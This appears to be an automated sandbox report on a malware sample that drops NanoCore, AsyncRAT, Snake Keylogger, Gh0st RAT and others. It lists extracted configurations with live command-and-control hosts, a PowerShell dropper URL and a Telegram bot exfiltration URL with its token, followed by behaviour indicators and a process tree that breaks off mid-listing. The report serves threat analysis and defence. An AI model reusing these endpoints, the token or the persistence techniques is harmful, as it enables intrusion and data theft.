amadey | 188e97ba18d7394cb3949e66c8aeb062e3ea8675371d0ee2b5126b52366530ae

max time kernel
8s
max time network
420s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
06-06-2023 14:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a.exe
Size

5KB
MD5

8ce1f6882edc51f701bbe648e40dd133
SHA1

496b3df4657e9d11df14a8ad267061d97249b511
SHA256

188e97ba18d7394cb3949e66c8aeb062e3ea8675371d0ee2b5126b52366530ae
SHA512

5826ea307fa12db5a8005fae8758314c0810e956ead3504fda7cadaccdbe737d609dfdfdc51996ab2eb350eae20398f8fbb97b16aa01f2af373c1ba20767d7d6
SSDEEP

48:6jtGAK8lb9ivcfaFSfkQLJhyPFlL8thCb/IExQpwOulavTqXSfbNtm:OI0iUaakQqDgtmQpmsvNzNt

Score

10^/10

amadey asyncrat gh0strat nanocore redline snakekeylogger collection evasion infostealer keylogger persistence rat spyware stealer trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://transparenciacanaa.com.br/cidadejunina/js/vendor/debug2.ps1

Extracted

Family

nanocore

Version

1.2.2.0

ezemnia3.ddns.net:62335

91.193.75.178:62335

Mutex

954449b5-566c-46fe-92f0-8eb82a7f77b0

Attributes

activate_away_mode
true
backup_connection_host
91.193.75.178
backup_dns_server
8.8.4.4
buffer_size
65535
build_time
2023-01-23T18:14:17.620110936Z
bypass_user_account_control
true
bypass_user_account_control_data
clear_access_control
true
clear_zone_identifier
false
connect_delay
4000
connection_port
62335
default_group
Cashout
enable_debug_mode
true
gc_threshold
1.048576e+07
keep_alive_timeout
30000
keyboard_logging
false
lan_timeout
2500
max_packet_size
1.048576e+07
mutex
954449b5-566c-46fe-92f0-8eb82a7f77b0
mutex_timeout
5000
prevent_system_sleep
false
primary_connection_host
ezemnia3.ddns.net
primary_dns_server
8.8.8.8
request_elevation
true
restart_delay
5000
run_delay
0
run_on_startup
false
set_critical_process
true
timeout_interval
5000
use_custom_dns_server
false
version
1.2.2.0
wan_timeout
8000

Extracted

Family

snakekeylogger

https://api.telegram.org/bot6184780923:AAHbCGrBU_2zg9A-73yTyKKCMGf1tkzUFbM/sendMessage?chat_id=759814203

Extracted

Family

asyncrat

Version

0.5.6A

richard4545.loseyourip.com:6606

richard4545.loseyourip.com:7707

richard4545.loseyourip.com:8808

richard4545.loseyourip.com:3850

richard4545.loseyourip.com:3845

103.212.81.152:6606

103.212.81.152:7707

103.212.81.152:8808

103.212.81.152:3850

103.212.81.152:3845

Mutex

cccphnbynt

Attributes

delay
5
install
false
install_folder
%AppData%

aes.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Gh0st RAT payload 5 IoCs

resource	yara_rule
behavioral1/memory/720-329-0x0000000010000000-0x000000001034B000-memory.dmp	family_gh0strat
behavioral1/memory/720-326-0x0000000010000000-0x000000001034B000-memory.dmp	family_gh0strat
behavioral1/memory/192-370-0x0000000010000000-0x000000001034B000-memory.dmp	family_gh0strat
behavioral1/memory/192-371-0x0000000010000000-0x000000001034B000-memory.dmp	family_gh0strat
behavioral1/memory/192-372-0x0000000010000000-0x000000001034B000-memory.dmp	family_gh0strat

Gh0strat
Gh0st RAT is a remote access tool (RAT) with its source code public and it has been used by multiple Chinese groups.
rat gh0strat
NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
keylogger trojan stealer spyware nanocore
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
stealer keylogger snakekeylogger

Snake Keylogger payload 1 IoCs

resource	yara_rule
behavioral1/memory/1300-163-0x0000000000400000-0x000000000041E000-memory.dmp	family_snakekeylogger

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/memory/3436-232-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat

Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 12 IoCs

pid	Process
2416	install1.exe
4956	wininit.exe
1384	NA.exe
3892	BHHh.exe
1324	A.exe
3676	BBHhHhB.exe
4140	G.exe
4324	BMKNJPO87.exe
1352	H.exe
4380	ceshi.exe
1692	YYY.exe
4232	Conhost.exe

UPX packed file 9 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/720-329-0x0000000010000000-0x000000001034B000-memory.dmp	upx
behavioral1/memory/720-326-0x0000000010000000-0x000000001034B000-memory.dmp	upx
behavioral1/memory/720-311-0x0000000010000000-0x000000001034B000-memory.dmp	upx
behavioral1/memory/192-367-0x0000000010000000-0x000000001034B000-memory.dmp	upx
behavioral1/memory/192-370-0x0000000010000000-0x000000001034B000-memory.dmp	upx
behavioral1/memory/192-371-0x0000000010000000-0x000000001034B000-memory.dmp	upx
behavioral1/memory/192-372-0x0000000010000000-0x000000001034B000-memory.dmp	upx
behavioral1/files/0x000800000001af9d-592.dat	upx
behavioral1/files/0x000800000001af9d-593.dat	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Caspol.exe
Key opened	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Caspol.exe
Key opened	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Caspol.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\SMTP Subsystem = "C:\\Program Files (x86)\\SMTP Subsystem\\smtpss.exe"	Caspol.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 6 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
22	checkip.dyndns.org
220	ip-api.com
374	ipinfo.io
376	ipinfo.io
487	api.ipify.org
1087	ip-api.com

Suspicious use of SetThreadContext 8 IoCs

description	pid	Process	procid_target
PID 1384 set thread context of 4732	1384	NA.exe	71
PID 1324 set thread context of 1300	1324	A.exe	73
PID 4324 set thread context of 4700	4324	BMKNJPO87.exe	78
PID 1352 set thread context of 768	1352	H.exe	79
PID 768 set thread context of 1836	768	Caspol.exe	65
PID 4956 set thread context of 5028	4956	wininit.exe	85
PID 4700 set thread context of 1836	4700	Caspol.exe	65
PID 5028 set thread context of 1836	5028	AddInProcess32.exe	65

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\SMTP Subsystem\smtpss.exe	Caspol.exe
File opened for modification	C:\Program Files (x86)\SMTP Subsystem\smtpss.exe	Caspol.exe
File created	C:\Program Files\AppPatch\NetSyst96.dll	ceshi.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3776	sc.exe
4748	sc.exe
1424	sc.exe
5880	sc.exe
1312	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 10 IoCs

pid	pid_target	Process	procid_target
4344	1300	WerFault.exe	73
5456	5088	WerFault.exe	128
5608	3772	WerFault.exe	130
5732	5300	WerFault.exe	135
6244	4344	WerFault.exe	169
6736	6984	WerFault.exe	240
5792	5388	WerFault.exe	196
7892	6456	WerFault.exe	274
6096	2764	WerFault.exe	263
364	6828	WerFault.exe	330

NSIS installer 6 IoCs

installer

resource	yara_rule
behavioral1/files/0x000600000001b1ac-3160.dat	nsis_installer_1
behavioral1/files/0x000600000001b1ac-3160.dat	nsis_installer_2
behavioral1/files/0x000600000001b1b3-3341.dat	nsis_installer_1
behavioral1/files/0x000600000001b1b3-3341.dat	nsis_installer_2
behavioral1/files/0x000200000001abd4-3360.dat	nsis_installer_1
behavioral1/files/0x000200000001abd4-3360.dat	nsis_installer_2

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
7080	schtasks.exe
6128	schtasks.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
7484	tasklist.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
4868	NETSTAT.EXE

GoLang User-Agent 9 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	404	Go-http-client/1.1
HTTP User-Agent header	476	Go-http-client/1.1
HTTP User-Agent header	408	Go-http-client/1.1
HTTP User-Agent header	420	Go-http-client/1.1
HTTP User-Agent header	459	Go-http-client/1.1
HTTP User-Agent header	463	Go-http-client/1.1
HTTP User-Agent header	388	Go-http-client/1.1
HTTP User-Agent header	390	Go-http-client/1.1
HTTP User-Agent header	405	Go-http-client/1.1

Kills process with taskkill 1 IoCs

evasion

pid	Process
6200	taskkill.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
7008	PING.EXE

Suspicious behavior: EnumeratesProcesses 45 IoCs

pid	Process
1300	Caspol.exe
4732	Caspol.exe
4732	Caspol.exe
4732	Caspol.exe
768	Caspol.exe
768	Caspol.exe
4700	Caspol.exe
4700	Caspol.exe
768	Caspol.exe
768	Caspol.exe
768	Caspol.exe
768	Caspol.exe
768	Caspol.exe
768	Caspol.exe
4700	Caspol.exe
4700	Caspol.exe
4956	wininit.exe
4700	Caspol.exe
4956	wininit.exe
4700	Caspol.exe
4700	Caspol.exe
4700	Caspol.exe
4956	wininit.exe
4956	wininit.exe
4956	wininit.exe
4956	wininit.exe
4956	wininit.exe
4956	wininit.exe
4956	wininit.exe
4956	wininit.exe
4956	wininit.exe
4956	wininit.exe
4956	wininit.exe
4956	wininit.exe
4956	wininit.exe
4956	wininit.exe
5028	AddInProcess32.exe
5028	AddInProcess32.exe
5028	AddInProcess32.exe
5028	AddInProcess32.exe
5028	AddInProcess32.exe
5028	AddInProcess32.exe
5028	AddInProcess32.exe
5028	AddInProcess32.exe
1300	Caspol.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
768	Caspol.exe
4700	Caspol.exe
5028	AddInProcess32.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

description	pid	Process
Token: SeDebugPrivilege	1836	a.exe
Token: SeDebugPrivilege	4956	wininit.exe
Token: SeDebugPrivilege	1300	Caspol.exe
Token: SeDebugPrivilege	3892	BHHh.exe
Token: SeDebugPrivilege	4732	Caspol.exe
Token: SeDebugPrivilege	768	Caspol.exe
Token: SeDebugPrivilege	4700	Caspol.exe
Token: SeDebugPrivilege	3676	BBHhHhB.exe
Token: SeDebugPrivilege	2416	install1.exe
Token: SeDebugPrivilege	4140	G.exe
Token: SeDebugPrivilege	5028	AddInProcess32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1836 wrote to memory of 2416	1836	a.exe	67
PID 1836 wrote to memory of 2416	1836	a.exe	67
PID 1836 wrote to memory of 2416	1836	a.exe	67
PID 1836 wrote to memory of 4956	1836	a.exe	68
PID 1836 wrote to memory of 4956	1836	a.exe	68
PID 1836 wrote to memory of 1384	1836	a.exe	69
PID 1836 wrote to memory of 1384	1836	a.exe	69
PID 1836 wrote to memory of 3892	1836	a.exe	70
PID 1836 wrote to memory of 3892	1836	a.exe	70
PID 1836 wrote to memory of 3892	1836	a.exe	70
PID 1384 wrote to memory of 4732	1384	NA.exe	71
PID 1384 wrote to memory of 4732	1384	NA.exe	71
PID 1384 wrote to memory of 4732	1384	NA.exe	71
PID 1384 wrote to memory of 4732	1384	NA.exe	71
PID 1384 wrote to memory of 4732	1384	NA.exe	71
PID 1384 wrote to memory of 4732	1384	NA.exe	71
PID 1384 wrote to memory of 4732	1384	NA.exe	71
PID 1384 wrote to memory of 4732	1384	NA.exe	71
PID 1836 wrote to memory of 1324	1836	a.exe	72
PID 1836 wrote to memory of 1324	1836	a.exe	72
PID 1836 wrote to memory of 3676	1836	a.exe	74
PID 1836 wrote to memory of 3676	1836	a.exe	74
PID 1836 wrote to memory of 3676	1836	a.exe	74
PID 1324 wrote to memory of 1300	1324	A.exe	73
PID 1324 wrote to memory of 1300	1324	A.exe	73
PID 1324 wrote to memory of 1300	1324	A.exe	73
PID 1324 wrote to memory of 1300	1324	A.exe	73
PID 1324 wrote to memory of 1300	1324	A.exe	73
PID 1324 wrote to memory of 1300	1324	A.exe	73
PID 1324 wrote to memory of 1300	1324	A.exe	73
PID 1324 wrote to memory of 1300	1324	A.exe	73
PID 1836 wrote to memory of 4140	1836	a.exe	75
PID 1836 wrote to memory of 4140	1836	a.exe	75
PID 1836 wrote to memory of 4140	1836	a.exe	75
PID 1836 wrote to memory of 4324	1836	a.exe	76
PID 1836 wrote to memory of 4324	1836	a.exe	76
PID 1836 wrote to memory of 1352	1836	a.exe	77
PID 1836 wrote to memory of 1352	1836	a.exe	77
PID 4324 wrote to memory of 4700	4324	BMKNJPO87.exe	78
PID 4324 wrote to memory of 4700	4324	BMKNJPO87.exe	78
PID 4324 wrote to memory of 4700	4324	BMKNJPO87.exe	78
PID 4324 wrote to memory of 4700	4324	BMKNJPO87.exe	78
PID 4324 wrote to memory of 4700	4324	BMKNJPO87.exe	78
PID 4324 wrote to memory of 4700	4324	BMKNJPO87.exe	78
PID 1352 wrote to memory of 768	1352	H.exe	79
PID 1352 wrote to memory of 768	1352	H.exe	79
PID 1352 wrote to memory of 768	1352	H.exe	79
PID 1352 wrote to memory of 768	1352	H.exe	79
PID 1352 wrote to memory of 768	1352	H.exe	79
PID 1352 wrote to memory of 768	1352	H.exe	79
PID 1836 wrote to memory of 4380	1836	a.exe	80
PID 1836 wrote to memory of 4380	1836	a.exe	80
PID 1836 wrote to memory of 4380	1836	a.exe	80
PID 4956 wrote to memory of 4852	4956	wininit.exe	81
PID 4956 wrote to memory of 4852	4956	wininit.exe	81
PID 4956 wrote to memory of 5064	4956	wininit.exe	82
PID 4956 wrote to memory of 5064	4956	wininit.exe	82
PID 4956 wrote to memory of 4812	4956	wininit.exe	92
PID 4956 wrote to memory of 4812	4956	wininit.exe	92
PID 4956 wrote to memory of 4992	4956	wininit.exe	91
PID 4956 wrote to memory of 4992	4956	wininit.exe	91
PID 4956 wrote to memory of 4940	4956	wininit.exe	90
PID 4956 wrote to memory of 4940	4956	wininit.exe	90
PID 4956 wrote to memory of 4952	4956	wininit.exe	89

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Caspol.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Caspol.exe

C:\Users\Admin\AppData\Local\Temp\a.exe
"C:\Users\Admin\AppData\Local\Temp\a.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1836
- C:\Users\Admin\AppData\Local\Temp\a\install1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\install1.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2416
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA1AA==
    3⤵
    PID:4280
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4976
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    3⤵
    PID:2136
- C:\Users\Admin\AppData\Local\Temp\a\wininit.exe
  "C:\Users\Admin\AppData\Local\Temp\a\wininit.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4956
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe"
    3⤵
    PID:4852
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
    3⤵
    PID:5064
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe"
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    PID:5028
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe"
    3⤵
    PID:4976
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe"
    3⤵
    PID:4280
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
    3⤵
    PID:4952
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe"
    3⤵
    PID:4940
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\EdmGen.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\EdmGen.exe"
    3⤵
    PID:4992
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe"
    3⤵
    PID:4812
- C:\Users\Admin\AppData\Local\Temp\a\NA.exe
  "C:\Users\Admin\AppData\Local\Temp\a\NA.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:1384
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    - Adds Run key to start application
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4732
- C:\Users\Admin\AppData\Local\Temp\a\BHHh.exe
  "C:\Users\Admin\AppData\Local\Temp\a\BHHh.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3892
- C:\Users\Admin\AppData\Local\Temp\a\A.exe
  "C:\Users\Admin\AppData\Local\Temp\a\A.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:1324
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    - Accesses Microsoft Outlook profiles
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - outlook_office_path
    - outlook_win_path
    PID:1300
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1300 -s 1524
      4⤵
      Program crash
      PID:4344
- C:\Users\Admin\AppData\Local\Temp\a\BBHhHhB.exe
  "C:\Users\Admin\AppData\Local\Temp\a\BBHhHhB.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3676
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\YYY.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\YYY.exe"
    3⤵
    PID:4232
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
      4⤵
      PID:224
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 1 & Del "C:\Users\Admin\AppData\Local\Temp\a\BBHhHhB.exe"
    3⤵
    PID:4108
  - - C:\Windows\SysWOW64\choice.exe
      choice /C Y /N /D Y /T 1
      4⤵
      PID:1140
- C:\Users\Admin\AppData\Local\Temp\a\G.exe
  "C:\Users\Admin\AppData\Local\Temp\a\G.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4140
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\YYY.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\YYY.exe"
    3⤵
    - Executes dropped EXE
    PID:1692
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
      4⤵
      PID:3436
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 1 & Del "C:\Users\Admin\AppData\Local\Temp\a\G.exe"
    3⤵
    PID:3332
  - - C:\Windows\SysWOW64\choice.exe
      choice /C Y /N /D Y /T 1
      4⤵
      PID:1136
- C:\Users\Admin\AppData\Local\Temp\a\BMKNJPO87.exe
  "C:\Users\Admin\AppData\Local\Temp\a\BMKNJPO87.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:4324
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    PID:4700
- C:\Users\Admin\AppData\Local\Temp\a\H.exe
  "C:\Users\Admin\AppData\Local\Temp\a\H.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:1352
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    PID:768
- C:\Users\Admin\AppData\Local\Temp\a\ceshi.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ceshi.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:4380
- - C:\Program Files (x86)\Microsoft Krptvw\Mxqekzr.exe
    "C:\Program Files (x86)\Microsoft Krptvw\Mxqekzr.exe"
    3⤵
    PID:5596
- C:\Windows\SysWOW64\NETSTAT.EXE
  "C:\Windows\SysWOW64\NETSTAT.EXE"
  2⤵
  - Gathers network information
  PID:4868
- - C:\Program Files\Mozilla Firefox\Firefox.exe
    "C:\Program Files\Mozilla Firefox\Firefox.exe"
    3⤵
    PID:3772
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 3772 -s 460
      4⤵
      Program crash
      PID:5608
- C:\Windows\SysWOW64\autofmt.exe
  "C:\Windows\SysWOW64\autofmt.exe"
  2⤵
  PID:4220
- C:\Windows\SysWOW64\wscript.exe
  "C:\Windows\SysWOW64\wscript.exe"
  2⤵
  PID:4984
- - C:\Program Files\Mozilla Firefox\Firefox.exe
    "C:\Program Files\Mozilla Firefox\Firefox.exe"
    3⤵
    PID:5088
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 5088 -s 448
      4⤵
      Program crash
      PID:5456
- C:\Windows\SysWOW64\explorer.exe
  "C:\Windows\SysWOW64\explorer.exe"
  2⤵
  PID:4496
- - C:\Program Files\Mozilla Firefox\Firefox.exe
    "C:\Program Files\Mozilla Firefox\Firefox.exe"
    3⤵
    PID:5300
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 5300 -s 120
      4⤵
      Program crash
      PID:5732
- C:\Users\Admin\AppData\Local\Temp\a\88999.exe
  "C:\Users\Admin\AppData\Local\Temp\a\88999.exe"
  2⤵
  PID:720
- - C:\Program Files (x86)\Microsoft Efxkgq\Evnagqb.com
    "C:\Program Files (x86)\Microsoft Efxkgq\Evnagqb.com"
    3⤵
    PID:192
- C:\Users\Admin\AppData\Local\Temp\a\YYY.exe
  "C:\Users\Admin\AppData\Local\Temp\a\YYY.exe"
  2⤵
  PID:608
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe"
    3⤵
    PID:1424
- C:\Users\Admin\AppData\Local\Temp\a\Installer.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Installer.exe"
  2⤵
  PID:2864
- - C:\Windows\system32\notepad.exe
    "C:\Windows\system32\notepad.exe"
    3⤵
    PID:2228
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --no-first-run --no-default-browser-check --noerrdialogs --disable-backgrounding-occluded-windows --disable-background-timer-throttling --disable-background-networking --disable-extensions-http-throttling --disable-renderer-backgrounding --disable-audio-output --disable-breakpad --disable-sync --silent-launch --restore-last-session --ran-launcher --profile-directory="Default"
      4⤵
      PID:5068
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff8618a9758,0x7ff8618a9768,0x7ff8618a9778
        5⤵
        
        PID:1652
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --disable-audio-output --noerrdialogs --mojo-platform-channel-handle=1816 --field-trial-handle=2036,i,3573216929238625543,3791578305298733045,131072 /prefetch:8
        5⤵
        
        PID:352
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --disable-audio-output --noerrdialogs --mojo-platform-channel-handle=1776 --field-trial-handle=2036,i,3573216929238625543,3791578305298733045,131072 /prefetch:8
        5⤵
        
        PID:3364
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-breakpad --noerrdialogs --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1560 --field-trial-handle=2036,i,3573216929238625543,3791578305298733045,131072 /prefetch:2
        5⤵
        
        PID:1288
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --noerrdialogs --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-extensions-http-throttling --disable-background-timer-throttling --disable-breakpad --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3276 --field-trial-handle=2036,i,3573216929238625543,3791578305298733045,131072 /prefetch:1
        5⤵
        
        PID:1180
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
